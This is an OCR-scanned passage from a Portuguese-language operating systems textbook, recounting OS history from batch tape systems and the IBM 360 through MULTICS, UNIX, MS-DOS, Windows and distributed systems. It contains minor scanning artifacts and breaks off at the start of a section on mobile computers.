(e) O operador levava a fita de saída para o 1401. 
(f) O 1401 imprimia as saídas. 


(b) 


(c) 






usadas para a computação real. Essa situação é mostra- 
da na Figura 1.3. 

Após cerca de uma hora coletando um lote de tare- 
fas, os cartões eram lidos para uma fita magnética, que 
era levada até a sala de máquinas, onde era montada 
em uma unidade de fita. O operador então carregava 
um programa especial (o antecessor do sistema opera- 
cional de hoje), que lia a primeira tarefa da fita e en- 
tão a executava. A saída era escrita em uma segunda 
fita, em vez de ser impressa. Após cada tarefa ter sido 
concluída, o sistema operacional automaticamente lia a 
tarefa seguinte da fita e começava a executa-la. Quando 
o lote inteiro estava pronto, o operador removia as fitas 
de entrada e saída, substituía a fita de entrada com o 
próximo lote e trazia a fita de saída para um 1401 para 
impressão off-line (isto é, não conectada ao computa- 
dor principal). 

A estrutura de uma tarefa de entrada típica é mostra- 
da na Figura 1.4. Ela começava com um cartão $JOB, 
especificando um tempo máximo de processamento em 
minutos, o número da conta a ser debitada e o nome 
do programador. Então vinha um cartão $FORTRAN, 
dizendo ao sistema operacional para carregar o compi- 
lador FORTRAN da fita do sistema. Ele era diretamen- 
te seguido pelo programa a ser compilado, e então um 
cartão $LOAD, direcionando o sistema operacional a 
carregar o programa-objeto recém-compilado. (Progra- 
mas compilados eram muitas vezes escritos em fitas- 
-rascunho e tinham de ser carregados explicitamente.) 
Em seguida vinha o cartão $RUN, dizendo ao sistema 
operacional para executar o programa com os dados em 
seguida. Por fim, o cartão SEND marcava o término da 
tarefa. Esses cartões de controle primitivos foram os 
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precursores das linguagens de controle de tarefas e in- 
terpretadores de comando modernos. 

Os grandes computadores de segunda geração 
eram usados na maior parte para cálculos científicos e 
de engenharia, como solucionar as equações diferen- 
ciais parciais que muitas vezes ocorrem na física e na 
engenharia. Eles eram em grande parte programados 
em FORTRAN e linguagem de montagem. Sistemas 
operacionais típicos eram o FMS (o Fortran Monitor 
System) e o IBSYS, o sistema operacional da IBM 
para o 7094. 


1.2.3 A terceira geração (1965-1980): Cls e 
multiprogramação 


No início da década de 1960, a maioria dos fabri- 
cantes de computadores tinha duas linhas de produto 
distintas e incompatíveis. Por um lado, havia os com- 
putadores científicos de grande escala, orientados por 
palavras, como o 7094, usados para cálculos numéri- 
cos complexos na ciência e engenharia. De outro, os 
computadores comerciais, orientados por caracteres, 
como o 1401, que eram amplamente usados para or- 
denação e impressão de fitas por bancos e companhias 
de seguro. 

Desenvolver e manter duas linhas de produtos com- 
pletamente diferentes era uma proposição cara para 
os fabricantes. Além disso, muitos clientes novos de 
computadores inicialmente precisavam de uma máqui- 
na pequena, no entanto mais tarde a sobreutilizavam e 
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queriam uma máquina maior que executasse todos os 
seus programas antigos, porém mais rápido. 

A IBM tentou solucionar ambos os problemas com 
uma única tacada introduzindo o System/360. O 360 era 
uma série de máquinas com softwares compatíveis, des- 
de modelos do porte do 1401 a modelos muito maiores, 
mais potentes que o poderoso 7094. As máquinas dife- 
riam apenas em preço e desempenho (memória máxi- 
ma, velocidade do processador, número de dispositivos 
de E/S permitidos e assim por diante). Tendo em vista 
que todos tinham a mesma arquitetura e conjunto de 
instruções, programas escritos para uma máquina po- 
diam operar em todas as outras — pelo menos na teoria. 
(Mas como Yogi Berra! teria dito: “Na teoria, a teoria e 
a prática são a mesma coisa; na prática, elas não são”.) 
Tendo em vista que o 360 foi projetado para executar 
tanto computação científica (isto é, numérica) como 
comercial, uma única família de máquinas poderia sa- 
tisfazer necessidades de todos os clientes. Nos anos se- 
guintes, a IBM apresentou sucessores compatíveis com 
a linha 360, usando tecnologias mais modernas, conhe- 
cidas como as séries 370, 4300, 3080 e 3090. A zSeries 
é a descendente mais recente dessa linha, embora ela 
tenha divergido consideravelmente do original. 

O IBM 360 foi a primeira linha importante de com- 
putadores a usar CIs (circuitos integrados) de peque- 
na escala, proporcionando desse modo uma vantagem 
significativa na relação preço/desempenho sobre as 
máquinas de segunda geração, que foram construídas 
sobre transistores individuais. Foi um sucesso imediato, 
e a ideia de uma família de computadores compatíveis 
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foi logo adotada por todos os principais fabricantes. Os 
descendentes dessas máquinas ainda estão em uso nos 
centros de computadores atuais. Nos dias de hoje, eles 
são muitas vezes usados para gerenciar enormes ban- 
cos de dados (para sistemas de reservas de companhias 
aéreas, por exemplo) ou como servidores para sites da 
web que têm de processar milhares de requisições por 
segundo. 

O forte da ideia da “família única” foi ao mesmo 
tempo seu maior ponto fraco. A intenção original era 
de que todo software, incluindo o sistema operacional, 
OS/360, funcionasse em todos os modelos. Ele tinha 
de funcionar em sistemas pequenos — que muitas ve- 
zes apenas substituiam os 1401 na cópia de cartões 
para fitas —, e em sistemas muito grandes, que mui- 
tas vezes substituiam os 7094 para realizar previsões 
do tempo e outras tarefas de computação pesadas. Ele 
tinha de funcionar bem em sistemas com poucos pe- 
riféricos e naqueles com muitos periféricos, além de 
ambientes comerciais e ambientes científicos. Acima 
de tudo, ele tinha de ser eficiente para todos esses di- 
ferentes usos. 

Não havia como a IBM (ou qualquer outra empresa) 
criar um software que atendesse a todas essas exigên- 
cias conflitantes. O resultado foi um sistema opera- 
cional enorme e extraordinariamente complexo, talvez 
duas a três vezes maior do que o FMS. Ele consistia em 
milhões de linhas de linguagem de montagem escritas 
por milhares de programadores e continha dezenas de 
milhares de erros (bugs), que necessitavam de um fluxo 
contínuo de novas versões em uma tentativa de corrigi- 
-los. Cada nova versão corrigia alguns erros e introduzia 
novos, de maneira que o número de erros provavelmen- 
te seguiu constante através do tempo. 

Um dos projetistas do OS/360, Fred Brooks, subse- 
quentemente escreveu um livro incisivo e bem-humora- 
do (BROOKS, 1995) descrevendo as suas experiências 
com o OS/360. Embora seja impossível resumi-lo aqui, 
basta dizer que a capa mostra um rebanho de feras pré- 
-históricas atoladas em um poço de piche. A capa de 
Silberschatz et al. (2012) faz uma analogia entre os sis- 
temas operacionais e os dinossauros. 

Apesar do tamanho enorme e dos problemas, o 
OS/360 e os sistemas operacionais de terceira geração 
similares produzidos por outros fabricantes de com- 
putadores na realidade proporcionaram um grau de 
satisfação relativamente bom para a maioria de seus 
clientes. Eles também popularizaram várias técnicas- 
-chave ausentes nos sistemas operacionais de segunda 
geração. Talvez a mais importante dessas técnicas tenha 
sido a multiprogramação. No 7094, quando a tarefa 
atual fazia uma pausa para esperar por uma fita ou outra 


operação de E/S terminar, a CPU simplesmente ficava 
ociosa até o término da E/S. Para cálculos científicos 
com uso intenso da CPU, a E/S é esporádica, de maneira 
que o tempo ocioso não é significativo. Para o proces- 
samento de dados comercial, o tempo de espera de E/S 
pode muitas vezes representar de 80 a 90% do tempo 
total, de maneira que algo tem de ser feito para evitar 
que a CPU (cara) fique ociosa tanto tempo. 

A solução encontrada foi dividir a memória em vá- 
rias partes, com uma tarefa diferente em cada partição, 
como mostrado na Figura 1.5. Enquanto uma tarefa fi- 
cava esperando pelo término da E/S, outra podia usar a 
CPU. Se um número suficiente de tarefas pudesse ser 
armazenado na memória principal ao mesmo tempo, a 
CPU podia se manter ocupada quase 100% do tempo. 
Ter múltiplas tarefas na memória ao mesmo tempo de 
modo seguro exige um hardware especial para proteger 
cada uma contra interferências e transgressões por parte 
das outras, mas o 360 e outros sistemas de terceira gera- 
ção eram equipados com esse hardware. 

Outro aspecto importante presente nos sistemas ope- 
racionais de terceira geração foi a capacidade de trans- 
ferir tarefas de cartões para o disco tão logo eles eram 
trazidos para a sala do computador. Então, sempre que 
uma tarefa sendo executada terminava, o sistema ope- 
racional podia carregar uma nova tarefa do disco para 
a partição agora vazia e executá-la. Essa técnica é cha- 
mada de spooling (da expressão Simultaneous Peri- 
pheral Operation On Line) e também foi usada para 
saídas. Com spooling, os 1401 não eram mais necessá- 
rios, e muito do leva e traz de fitas desapareceu. 

Embora sistemas operacionais de terceira geração 
fossem bastante adequados para grandes cálculos cien- 
tíficos e operações maciças de processamento de dados 
comerciais, eles ainda eram basicamente sistemas em 
lote. Muitos programadores sentiam saudades dos tem- 
pos de computadores de primeira geração quando eles 
tinham a máquina só para si por algumas horas e assim 
podiam corrigir eventuais erros em seus programas ra- 
pidamente. Com sistemas de terceira geração, o tempo 
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entre submeter uma tarefa e receber de volta a saída era 
muitas vezes de várias horas, então uma única vírgula 
colocada fora do lugar podia provocar a falha de uma 
compilação, e o desperdício de metade do dia do pro- 
gramador. Programadores não gostavam muito disso. 

Esse desejo por um tempo de resposta rápido abriu 
o caminho para o timesharing (compartilhamento de 
tempo), uma variante da multiprogramação, na qual 
cada usuário tem um terminal on-line. Em um sistema 
de timesharing, se 20 usuários estão conectados e 17 
deles estão pensando, falando ou tomando café, a CPU 
pode ser alocada por sua vez para as três tarefas que 
demandam serviço. Já que ao depurar programas as pes- 
soas em geral emitem comandos curtos (por exemplo, 
compile um procedimento de cinco páginas)? em vez de 
comandos longos (por exemplo, ordene um arquivo de 
um milhão de registros), o computador pode proporcio- 
nar um serviço interativo rápido para uma série de usu- 
ários e talvez também executar tarefas de lote grandes 
em segundo plano quando a CPU estiver ociosa. O pri- 
meiro sistema de compartilhamento de tempo para fins 
diversos, o CTSS (Compatible Time Sharing Sys- 
tem — Sistema compatível de tempo compartilhado), 
foi desenvolvido no M.I.T. em um 7094 especialmen- 
te modificado (CORBATO et al., 1962). No entanto, 
o timesharing não se tornou popular de fato até que o 
hardware de proteção necessário passou a ser utilizado 
amplamente durante a terceira geração. 

Após o sucesso do sistema CTSS, o M.LT., a Bell 
Labs e a General Electric (à época uma grande fabri- 
cante de computadores) decidiram embarcar no desen- 
volvimento de um “computador utilitário”, isto é, uma 
máquina que daria suporte a algumas centenas de usu- 
ários simultâneos com compartilhamento de tempo. O 
modelo era o sistema de eletricidade — quando você 
precisa de energia elétrica, simplesmente conecta um 
pino na tomada da parede e, dentro do razoável, terá 
tanta energia quanto necessário. Os projetistas desse 
sistema, conhecido como MULTICS (MULTiplexed 
Information and Computing Service — Serviço de 
Computação e Informação Multiplexada), previram 
uma máquina enorme fornecendo energia computa- 
cional para todas as pessoas na área de Boston. A ideia 
de que máquinas 10.000 vezes mais rápidas do que o 
computador de grande porte GE-645 seriam vendidas 
(por bem menos de US$ 1.000) aos milhões apenas 40 
anos mais tarde era pura ficção científica. Mais ou me- 
nos como a ideia de trens transatlânticos supersônicos 
submarinos hoje em dia. 
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O MULTICS foi um sucesso relativo. Ele foi pro- 
jetado para suportar centenas de usuários em uma má- 
quina apenas um pouco mais poderosa do que um PC 
baseado no 386 da Intel, embora ele tivesse muito mais 
capacidade de E/S. A ideia não é tão maluca como pare- 
ce, tendo em vista que à época as pessoas sabiam como 
escrever programas pequenos e eficientes, uma habili- 
dade que depois foi completamente perdida. Havia mui- 
tas razões para que o MULTICS não tomasse conta do 
mundo, dentre elas, e não menos importante, o fato de 
que ele era escrito na linguagem de programação PL/I, 
e o compilador PL/I estava anos atrasado e funcionava 
de modo precário quando enfim chegou. Além disso, o 
MULTICS era muito ambicioso para sua época, de cer- 
ta maneira muito parecido com a máquina analítica de 
Charles Babbage no século XIX. 

Resumindo, o MULTICS introduziu muitas ideias 
seminais na literatura da computação, mas transformá-lo 
em um produto sério e um grande sucesso comercial foi 
muito mais difícil do que qualquer um havia esperado. 
A Bell Labs abandonou o projeto, e a General Electric 
abandonou completamente o negócio dos computado- 
res. Entretanto, o M.I.T. persistiu e finalmente colocou 
o MULTICS para funcionar. Em última análise ele foi 
vendido como um produto comercial pela empresa (Ho- 
neywell) que comprou o negócio de computadores da 
GE, e foi instalado por mais ou menos 80 empresas e 
universidades importantes mundo afora. Embora seus 
números fossem pequenos, os usuários do MULTICS 
eram muito leais. A General Motors, a Ford e a Agência 
de Segurança Nacional Norte-Americana, por exemplo, 
abandonaram os seus sistemas MULTICS apenas no fim 
da década de 1990, trinta anos depois de o MULTICS 
ter sido lançado e após anos de tentativas tentando fazer 
com que a Honeywell atualizasse o hardware. 

No fim do século XX, o conceito de um computador 
utilitário havia perdido força, mas ele pode voltar para 
valer na forma da computação na nuvem (cloud com- 
puting), na qual computadores relativamente pequenos 
(incluindo smartphones, tablets e assim por diante) 
estejam conectados a servidores em vastos e distantes 
centros de processamento de dados onde toda a compu- 
tação é feita com o computador local apenas executan- 
do a interface com o usuário. A motivação aqui é que a 
maioria das pessoas não quer administrar um sistema 
computacional cada dia mais complexo e detalhista, e 
preferem que esse trabalho seja realizado por uma equi- 
pe de profissionais, por exemplo, pessoas trabalhando 
para a empresa que opera o centro de processamento 
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de dados. O comércio eletrônico (e-commerce) já está 
evoluindo nessa direção, com várias empresas operando 
e-mails em servidores com múltiplos processadores aos 
quais as máquinas simples dos clientes se conectam de 
maneira bem similar à do projeto MULTICS. 

Apesar da falta de sucesso comercial, o MULTICS 
teve uma influência enorme em sistemas operacionais 
subsequentes (especialmente UNIX e seus derivativos, 
FreeBSD, Linux, iOS e Android). Ele é descrito em 
vários estudos e em um livro (CORBATÓ et al., 1972; 
CORBATO, VYSSOTSKY, 1965; DALEY e DENNIS, 
1968; ORGANICK, 1972; e SALTZER, 1974). Ele tam- 
bém tem um site ativo em <www.multicians.org>, com 
muitas informações sobre o sistema, seus projetistas e 
seus usuários. 

Outro importante desenvolvimento durante a tercei- 
ra geração foi o crescimento fenomenal dos minicom- 
putadores, começando com o DEC PDP-1 em 1961. O 
PDP-1 tinha apenas 4K de palavras de 18 bits, mas a 
US$ 120.000 por máquina (menos de 5% do preço de 
um 7094), vendeu como panqueca. Para determinado 
tipo de tarefas não numéricas, ele era quase tão rápido 
quanto o 7094 e deu origem a toda uma nova indús- 
tria. Ele foi logo seguido por uma série de outros PDPs 
(diferentemente da família IBM, todos incompatíveis), 
culminando no PDP-11. 

Um dos cientistas de computação no Bell Labs que 
havia trabalhado no projeto MULTICS, Ken Thomp- 
son, descobriu subsequentemente um minicomputador 
pequeno PDP-7 que ninguém estava usando e decidiu 
escrever uma versão despojada e para um usuário do 
MULTICS. Esse trabalho mais tarde desenvolveu-se no 
sistema operacional UNIX, que se tornou popular no 
mundo acadêmico, em agências do governo e em mui- 
tas empresas. 

A história do UNIX já foi contada em outras par- 
tes (por exemplo, SALUS, 1994). Parte da história será 
apresentada no Capítulo 10. Por ora, basta dizer que 
graças à ampla disponibilidade do código-fonte, várias 
organizações desenvolveram suas próprias versões (in- 
compatíveis), o que levou ao caos. Duas versões im- 
portantes foram desenvolvidas, o System V, da AT&T, 
e o BSD (Berkeley Software Distribution — distri- 
buição de software de Berkeley) da Universidade da 
Califórnia, em Berkeley. Elas tinham variantes menores 
também. Para tornar possível escrever programas que 
pudessem ser executados em qualquer sistema UNIX, 
o IEEE desenvolveu um padrão para o UNIX, chamado 
POSIX (Portable Operating System Interface — in- 
terface portátil para sistemas operacionais), ao qual a 
maioria das versões do UNIX dá suporte hoje em dia. 


O POSIX define uma interface minimalista de chamadas 
de sistema à qual os sistemas UNIX em conformidade 
devem dar suporte. Na realidade, alguns outros sistemas 
operacionais também dão suporte hoje em dia à interface 
POSIX. 

Como um adendo, vale a pena mencionar que, em 
1987, o autor lançou um pequeno clone do UNIX, cha- 
mado MINIX, para fins educacionais. Em termos fun- 
cionais, o MINIX é muito similar ao UNIX, incluindo 
o suporte ao POSIX. Desde então, a versão original 
evoluiu para o MINIX 3, que é bastante modular e fo- 
cado em ser altamente confiável. Ele tem a capacidade 
de detectar e substituir módulos defeituosos ou mesmo 
danificados (como drivers de dispositivo de E/S) em 
funcionamento, sem reinicializá-lo e sem perturbar os 
programas em execução. O foco é proporcionar uma al- 
tíssima confiabilidade e disponibilidade. Um livro que 
descreve a sua operação interna e lista o código-fonte 
em um apêndice também se encontra disponível (TA- 
NENBAUM, WOODHULL, 2006). O sistema MINIX 
3 está disponível gratuitamente (incluindo todo o códi- 
go-fonte) na internet em <www.minix3.org>. 

O desejo de produzir uma versão gratuita do MINIX 
(em vez de uma versão educacional) levou um estudante 
finlandês, Linus Torvalds, a escrever o Linux. Esse sis- 
tema foi diretamente inspirado pelo MINIX, desenvol- 
vido sobre ele e originalmente fornecia suporte a vários 
aspectos do MINIX (por exemplo, o sistema de arqui- 
vos do MINIX). Desde então, foi ampliado de muitas 
maneiras por muitas pessoas, mas ainda mantém algu- 
ma estrutura subjacente comum ao MINIX e ao UNIX. 
Os leitores interessados em uma história detalhada do 
Linux e do movimento de código aberto (open-source) 
podem ler o livro de Glyn Moody (2001). A maior parte 
do que será dito sobre o UNIX neste livro se aplica, 
portanto, ao System V, MINIX, Linux e outras versões 
e clones do UNIX também. 


1.2.4 A quarta geração (1980-presente): 
computadores pessoais 


Com o desenvolvimento dos circuitos integrados em 
larga escala (Large Scale Integration — LSI) — que são 
chips contendo milhares de transistores em um centímetro 
quadrado de silicone —, surgiu a era do computador mo- 
derno. Em termos de arquitetura, computadores pessoais 
(no início chamados de microcomputadores) não eram 
tão diferentes dos minicomputadores da classe PDP-11, 
mas em termos de preço eles eram certamente muito dife- 
rentes. Enquanto o minicomputador tornou possível para 
um departamento em uma empresa ou universidade ter o 


seu próprio computador, o chip microprocessador tornou 
possível para um único indivíduo ter o seu próprio com- 
putador pessoal. 

Em 1974, quando a Intel lançou o 8080, a primeira 
CPU de 8 bits de uso geral, ela queria um sistema opera- 
cional para ele, em parte para poder testá-lo. A Intel pe- 
diu a um dos seus consultores, Gary Kildall, para escrever 
um. Kildall e um amigo primeiro construíram um contro- 
lador para o recém-lançado disco flexível de 8 polegadas 
da Shugart Associates e o inseriram no 8080, produzindo 
assim o primeiro microcomputador com um disco. Kildall 
escreveu então um sistema operacional baseado em disco 
chamado CP/M (Control Program for Microcompu- 
ters — programa de controle para microcomputadores) 
para ele. Como a Intel não achava que microcomputadores 
baseados em disco tinham muito futuro, quando Kildall 
solicitou os direitos sobre o CP/M, a Intel concordou. Ele 
formou então uma empresa, Digital Research, para desen- 
volver o CP/M e vendê-lo. 

Em 1977, a Digital Research reescreveu o CP/M 
para torná-lo adequado para ser executado nos muitos 
microcomputadores que usavam o 8080, Zilog Z80 e 
outros microprocessadores. Muitos programas aplica- 
tivos foram escritos para serem executados no CP/M, 
permitindo que ele dominasse completamente o mundo 
da microcomputação por cerca de cinco anos. 

No início da década de 1980, a IBM projetou o IBM 
PC e saiu à procura de um software para ser executa- 
do nele. O pessoal na IBM contatou Bill Gates para 
licenciar o seu interpretador BASIC. Eles também per- 
guntaram se ele tinha conhecimento de um sistema ope- 
racional para ser executado no PC. Gates sugeriu que 
a IBM contatasse a Digital Research, então a empresa 
de sistemas operacionais dominante no mundo. Toman- 
do a que certamente foi a pior decisão de negócios na 
história, Kildall recusou-se a se encontrar com a IBM, 
mandando um subordinado em seu lugar. Para piorar as 
coisas, seu advogado chegou a recusar-se a assinar o 
acordo de sigilo da IBM cobrindo o ainda não anuncia- 
do PC. Em consequência, a IBM voltou a Gates, pergun- 
tando se ele não lhes forneceria um sistema operacional. 

Quando a IBM voltou, Gates se deu conta de que 
uma fabricante de computadores local, Seattle Compu- 
ter Products, tinha um sistema operacional adequado, 
DOS (Disk Operating System — sistema operacional 
de disco). Ele os procurou e pediu para comprá-lo (su- 
postamente por US$ 75.000), oferta que eles de pron- 
to aceitaram. Gates ofereceu então à IBM um pacote 
DOS/BASIC, que a empresa aceitou. A IBM queria fa- 
zer algumas modificações, então Gates contratou a pes- 
soa que havia escrito o DOS, Tim Paterson, como um 
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empregado da empresa emergente de Gates, Microsoft, 
para fazê-las. O sistema revisado foi renomeado MS- 
-DOS (MicroSoft Disk Operating System — Sistema 
operacional de disco da Microsoft) e logo passou a do- 
minar o mercado do IBM PC. Um fator-chave aqui foi 
a decisão de Gates (em retrospectiva, extremamente sá- 
bia) de vender o MS-DOS às empresas de computado- 
res em conjunto com o hardware, em comparação com 
a tentativa de Kildall de vender o CP/M aos usuários 
finais diretamente (pelo menos no início). Tempos de- 
pois de toda a história transparecer, Kildall morreu de 
maneira súbita e inesperada de causas que não foram 
completamente elucidadas. 

Quando o sucessor do IBM PC, o IBM PC/AT, foi 
lançado em 1983 com o CPU Intel 80286, o MS-DOS 
estava firmemente estabelecido enquanto o CP/M vivia 
seus últimos dias. O MS-DOS mais tarde foi amplamen- 
te usado no 80386 e no 80486. Embora a versão inicial 
do MS-DOS fosse relativamente primitiva, as versões 
subsequentes incluíam aspectos mais avançados, mui- 
tos tirados do UNIX. (A Microsoft tinha plena consci- 
ência do UNIX, chegando até a vender uma versão em 
microcomputador dele chamada XENIX durante os pri- 
meiras anos da empresa.) 

O CP/M, MS-DOS e outros sistemas operacionais 
para os primeiros microcomputadores eram todos ba- 
seados na digitação de comandos no teclado pelos 
usuários. Isto finalmente mudou por conta da pesquisa 
realizada por Doug Engelbert no Instituto de Pesquisa 
de Stanford na década de 1960. Engelbart inventou a 
Graphical User Interface (GUI — Interface Gráfica do 
Usuário), completa com janelas, ícones, menus e mou- 
se. Essas ideias foram adotadas por pesquisadores na 
Xerox PARC e incorporadas nas máquinas que eles 
produziram. 

Um dia, Steve Jobs, que coinventou o computador 
Apple em sua garagem, visitou a PARC, viu uma GUI e no 
mesmo instante percebeu o seu valor potencial, algo que o 
gerenciamento da Xerox notoriamente não fez. Esse erro 
estratégico de proporções gigantescas levou a um livro in- 
titulado Fumbling the Future (SMITH e ALEXANDER, 
1988). Jobs partiu então para a produção de um Apple 
com o GUI. O projeto levou ao Lisa, que era caro demais 
e fracassou comercialmente. A segunda tentativa de Jobs, o 
Apple Macintosh, foi um sucesso enorme, não apenas por- 
que ele era muito mais barato que o Lisa, mas também por 
ser amigável ao usuário, significando que era dirigido a 
usuários que não apenas não sabiam nada sobre computa- 
dores como não tinham intenção alguma de aprender sobre 
eles. No mundo criativo do design gráfico, fotografia digi- 
tal profissional e produção de vídeos digitais profissionais, 
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Macintoshes são amplamente utilizados e seus usuários 
entusiastas do seu desempenho. Em 1999, a Apple adotou 
um núcleo derivado do micronúcleo Mach da Universida- 
de Carnegie Mellon que foi originalmente desenvolvido 
para substituir o núcleo do BDS UNIX. Desse modo, o 
MAC OS X é um sistema operacional baseado no UNIX, 
embora com uma interface bastante distinta. 

Quando decidiu produzir um sucessor para o MS- 
-DOS, a Microsoft foi fortemente influenciada pelo su- 
cesso do Macintosh. Ela produziu um sistema baseado 
em GUI chamado Windows, que originalmente era exe- 
cutado em cima do MS-DOS (isto é, era mais como um 
interpretador de comandos — shell — do que um siste- 
ma operacional de verdade). Por cerca de dez anos, de 
1985 a 1995, o Windows era apenas um ambiente gráfi- 
co sobre o MS-DOS. Entretanto, começando em 1995, 
uma versão independente, Windows 95, foi lançada in- 
corporando muitos aspectos de sistemas operacionais, 
usando o sistema MS-DOS subjacente apenas para sua 
inicialização e para executar velhos programas do MS- 
-DOS. Em 1998, uma versão ligeiramente modificada 
deste sistema, chamada Windows 98, foi lançada. Não 
obstante isso, tanto o Windows 95 como o Windows 98 
ainda continham uma grande quantidade da linguagem 
de montagem de 16 bits da Intel. 

Outro sistema operacional da Microsoft, o Windows 
NT (em que o NT representa New Technology), era 
compatível com o Windows 95 até um determinado 
nível, mas internamente, foi completamente reescrito. 
Era um sistema de 32 bits completo. O principal pro- 
jetista do Windows NT foi David Cutler, que também 
foi um dos projetistas do sistema operacional VAX 
VMS, de maneira que algumas ideias do VMS estão 
presentes no NT. Na realidade, tantas ideias do VMS 
estavam presentes nele, que seu proprietário, DEC, 
processou a Microsoft. O caso foi acordado extraju- 
dicialmente por uma quantidade de dinheiro exigindo 
muitos dígitos para ser escrita. A Microsoft esperava 
que a primeira versão do NT acabaria com o MS-DOS 
e que todas as versões depois dele seriam um sistema 
vastamente superior, mas isso não aconteceu. Apenas 
com o Windows NT 4.0 o sistema enfim arrancou de 
verdade, especialmente em redes corporativas. A ver- 
são 5 do Windows NT foi renomeada Windows 2000 
no início do ano de 1999. A intenção era que ela fosse 
a sucessora tanto do Windows 98, quanto do Windows 
NT 4.0. 

Essa versão também não teve êxito, então a Micro- 
soft produziu mais uma versão do Windows 98, cha- 
mada Windows ME (Millenium Edition). Em 2001, 
uma versão ligeiramente atualizada do Windows 2000, 


chamada Windows XP foi lançada. Ela teve uma vida 
muito mais longa (seis anos), basicamente substituindo 
todas as versões anteriores do Windows. 

Mesmo assim, a geração de versões continuou firme. 
Após o Windows 2000, a Microsoft dividiu a família 
Windows em uma linha de clientes e outra de servidores. 
A linha de clientes era baseada no XP e seus sucessores, 
enquanto a de servidores incluía o Windows Server 2003 
e o Windows 2008. Uma terceira linha, para o mundo 
embutido, apareceu um pouco mais tarde. Todas essas 
versões do Windows aumentaram suas variações na for- 
ma de pacotes de serviço (service packs). Foi o sufi- 
ciente para deixar alguns administradores (e escritores de 
livros didáticos sobre sistemas operacionais) estupefatos. 

Então, em janeiro de 2007, a Microsoft finalmente 
lançou o sucessor para o Windows XP, chamado Vis- 
ta. Ele veio com uma nova interface gráfica, segurança 
mais firme e muitos programas para os usuários novos 
ou atualizados. A Microsoft esperava que ele substi- 
tuísse o Windows XP completamente, mas isso nunca 
aconteceu. Em vez disso, ele recebeu muitas críticas 
e uma cobertura negativa da imprensa, sobretudo por 
causa das exigências elevadas do sistema, termos de li- 
cenciamento restritivos e suporte para o Digital Rights 
Management, técnicas que tornaram mais difícil para 
os usuários copiarem material protegido. 

Com a chegada do Windows 7 — uma versão nova e 
muito menos faminta de recursos do sistema operacional 
—, muitas pessoas decidiram pular completamente o Vis- 
ta. O Windows 7 não introduziu muitos aspectos novos, 
mas era relativamente pequeno e bastante estável. Em me- 
nos de três semanas, o Windows 7 havia conquistado um 
mercado maior do que o Vista em sete meses. Em 2012, a 
Microsoft lançou o sucessor, Windows 8, um sistema ope- 
racional com visual e sensação completamente diferentes, 
voltado para telas de toque. A empresa espera que o novo 
design se torne o sistema operacional dominante em uma 
série de dispositivos: computadores de mesa (desktops), 
laptops, notebooks, tablets, telefones e PCs de home thea- 
ter. Até o momento, no entanto, a penetração de mercado 
é lenta em comparação ao Windows 7. 

Outro competidor importante no mundo dos compu- 
tadores pessoais é o UNIX (e os seus vários derivati- 
vos). O UNIX é mais forte entre servidores de rede e de 
empresas, mas também está presente em computadores 
de mesa, notebooks, tablets e smartphones. Em compu- 
tadores baseados no x86, o Linux está se tornando uma 
alternativa popular ao Windows para estudantes e cada 
vez mais para muitos usuários corporativos. 

Como nota, usaremos neste livro o termo x86 para 
nos referirmos a todos os processadores modernos 


baseados na família de arquiteturas de instruções que 
começaram com o 8086 na década de 1970. Há mui- 
tos processadores desse tipo, fabricados por empresas 
como a AMD e a Intel, e por dentro eles muitas vezes 
diferem consideravelmente: processadores podem ter 
32 ou 64 bits com poucos ou muitos núcleos e pipelines 
que podem ser profundos ou rasos, e assim por dian- 
te. Não obstante, para o programador, todos parecem 
bastante similares e todos ainda podem ser executados 
no código 8086 que foi escrito 35 anos atrás. Onde a 
diferença for importante, vamos nos referir a modelos 
explícitos em vez disso — e usar 0 x86-32 e o x86-64 
para indicar variantes de 32 bits e 64 bits. 

O FreeBSD também é um derivado popular do 
UNIX, originado do projeto BSD em Berkeley. Todos 
os computadores Macintosh modernos executam uma 
versão modificada do FreeBSD (OS X). O UNIX tam- 
bém é padrão em estações de trabalho equipadas com 
chips RISC de alto desempenho. Seus derivados são 
amplamente usados em dispositivos móveis, os que 
executam iOS 7 ou Android. 

Muitos usuários do UNIX, em especial programado- 
res experientes, preferem uma interface baseada em co- 
mandos a uma GUI, de maneira que praticamente todos 
os sistemas UNIX dão suporte a um sistema de janelas 
chamado de X Window System (também conhecido 
como X11) produzido no M.LT. Esse sistema cuida do 
gerenciamento básico de janelas, permitindo que os usu- 
ários criem, removam, movam e redimensionem as jane- 
las usando o mouse. Muitas vezes uma GUI completa, 
como Gnome ou KDE, está disponível para ser execu- 
tada em cima do X11, dando ao UNIX uma aparência e 
sensação semelhantes ao Macintosh ou Microsoft Win- 
dows, para aqueles usuários do UNIX que buscam isso. 

Um desenvolvimento interessante que começou a 
ocorrer em meados da década de 1980 foi o crescimen- 
to das redes de computadores pessoais executando sis- 
temas operacionais de rede e sistemas operacionais 
distribuídos (TANENBAUM e VAN STEEN, 2007). 
Em um sistema operacional de rede, os usuários estão 
conscientes da existência de múltiplos computadores e 
podem conectar-se a máquinas remotas e copiar arqui- 
vos de uma máquina para outra. Cada máquina executa 
seu próprio sistema operacional e tem seu próprio usuá- 
rio local (ou usuários). 

Sistemas operacionais de rede não são fundamental- 
mente diferentes de sistemas operacionais de um único 
processador. Eles precisam, óbvio, de um controlador 
de interface de rede e algum software de baixo nível 
para executá-los, assim como programas para conseguir 
realizar o login remoto e o acesso remoto a arquivos, 
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mas esses acréscimos não mudam a estrutura essencial 
do sistema operacional. 

Um sistema operacional distribuído, por sua vez, 
aparece para os seus usuários como um sistema mo- 
noprocessador tradicional, embora seja na realidade 
composto de múltiplos processadores. Os usuários não 
precisam saber onde os programas estão sendo execu- 
tados ou onde estão localizados os seus arquivos; isso 
tudo deve ser cuidado automática e eficientemente pelo 
sistema operacional. 

Sistemas operacionais de verdade exigem mais do 
que apenas acrescentar um pequeno código a um sistema 
operacional monoprocessador, pois sistemas distribuí- 
dos e centralizados diferem em determinadas maneiras 
críticas. Os distribuídos, por exemplo, muitas vezes 
permitem que aplicativos sejam executados em vários 
processadores ao mesmo tempo, demandando assim al- 
goritmos mais complexos de escalonamento de proces- 
sadores a fim de otimizar o montante de paralelismo. 

Atrasos de comunicação dentro da rede muitas ve- 
zes significam que esses (e outros) algoritmos devem 
estar sendo executados com informações incorretas, de- 
satualizadas ou incompletas. Essa situação difere radi- 
calmente daquela em um sistema monoprocessador no 
qual o sistema operacional tem informações completas 
sobre o estado do sistema. 


1.2.5 A quinta geração (1990-presente): 
computadores móveis 


Desde os dias em que o detetive Dick Tracy co- 
meçou a falar para o seu “rádio relógio de pulso” nos 
quadrinhos da década de 1940, as pessoas desejavam 
